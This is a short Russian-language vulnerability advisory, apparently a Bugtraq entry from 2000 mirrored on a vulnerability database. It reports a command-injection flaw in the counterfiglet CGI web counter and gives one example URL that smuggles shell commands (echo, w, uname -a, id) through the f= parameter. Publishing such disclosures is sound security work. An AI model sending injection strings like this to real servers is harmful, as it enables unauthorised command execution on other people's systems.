Lucene search

K
securityvulnsBUGTRAQSECURITYVULNS:VULN:156
HistoryMay 16, 2000 - 12:00 a.m.

Дырка в Web-counter'e counterfiglet

2000-05-1600:00:00
BUGTRAQ
vulners.com
33

Вызов system с непроверяемым на shell-метасимволы вводом пользователя позволяют выполнить любое приложение на сервере, например http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id